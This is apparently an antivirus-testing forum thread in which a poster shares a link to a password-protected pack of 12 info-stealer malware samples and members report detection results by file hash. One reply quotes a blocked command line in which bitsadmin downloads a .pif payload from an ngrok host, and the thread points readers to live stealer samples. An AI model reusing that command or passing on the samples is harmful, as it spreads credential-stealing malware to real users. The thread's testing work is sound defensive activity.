Stealer 12x(VT均低于14)

Fadouse

https://www.123865.com/s/HmItjv-nvn2?提取码:lVim
详细的VT检出率, 文件SHA256 均在压缩包下的results文件夹中

心醉咖啡

火绒2.8

hipoxiaxxx

e235ca20ad4ef47f61cfe1ca2503a62639ca8b8e744921e819e351a3acfb5029 压缩包密码未知
FortiClient 扫描 2X

95f89677ac06e21b3fb760233e4a8caf5a49cad663bb9a4944a904dfa3debdab.exe - PossibleThreat.RF
25f719d585f09382477280b7e6fae7717bb9e33592ab709fbe32b7441d267d59.js - Malware_Generic.P0

anthonyqian

VT检测率低不代表好样本，很多都是陈年老样本了，主流杀软迟迟不入库是有原因的

Fadouse

anthonyqian 发表于 2025-2-9 22:12
VT检测率低不代表好样本，很多都是陈年老样本了，主流杀软迟迟不入库是有原因的

由于是代码自动收集，本包中确实在2018创建和部分低质量的样本，非常抱歉
但我能保证本包中全部样本的第一次提交MB/VT时间在这三个月内
且保证所有样本在joesandbox等众多沙箱中表现出恶意行为

早上起来不刷牙

解压密码居然不是infected

Fadouse

早上起来不刷牙 发表于 2025-2-9 22:42
解压密码居然不是infected

samples下的压缩包解码密码是infected

早上起来不刷牙

Fadouse 发表于 2025-2-9 22:43
samples下的压缩包解码密码是infected

解压后还有五个不明压缩包

Loyisa

BD

1fef8663b000fcbf0db2f683fa360bc3db874f13577908a43c9ba5a28383d50f.msi 扫描+双击无动作
7e4b3d4db3c55072ba5daf5173748965734aa5f34ac09d95b751a1d65f8ed558 -> 压缩密码错误
25f719d585f09382477280b7e6fae7717bb9e33592ab709fbe32b7441d267d59.js Trojan.GenericKD.75824202
73b47149af8a048750833f65d3d95039f06d54fcd74f856bd1bce04dbb7ceb3c.exe 扫描+双击无动作83a3d826a340b78012613d5df41ceb49c61c3451370c0183fcdff60f3807f0f5 -> 密码错误95f89677ac06e21b3fb760233e4a8caf5a49cad663bb9a4944a904dfa3debdab.exe -> 在桌面生成了个info.txt后自退
416bfa52d8896acd2b8c62fa098e2299bb15435a7899f6bd6b66a73e9c18cae5.bat Trojan.GenericKD.75706910
3447e206c0db57c77033ffa0b18ace5bd8e31644a4bee7d6a23400243dc24479 -> 扫描+双击无动作
4436cc18ef65dd284e717474b86a3a00574f41c8adf41aa04b108c8324597947 -> 拦截mshta
d9cbee5015d5b13673cc5cbb6e8b0d3923d453f27b60bccf2a69e61010afa7aa -> 密码错误
e235ca20ad4ef47f61cfe1ca2503a62639ca8b8e744921e819e351a3acfb5029 Trojan.GenericKD.75465001
f40c1d241f0c053f957c7f54019b136b159f2a17ce3e170fc581749f2889e718.js

1. 該應用程式 C:\Windows\System32\bitsadmin.exe 被傳遞了惡意命令列並已被封鎖。您的裝置現在安全無虞。
   
2. 命令列："C:\Windows\System32\bitsadmin.exe" /transfer 8 https://041224.ngrok-free.app//BITZX.pif C:\Users\konsolas\BITZX.pif

复制代码

biue

腾讯电脑管家 不报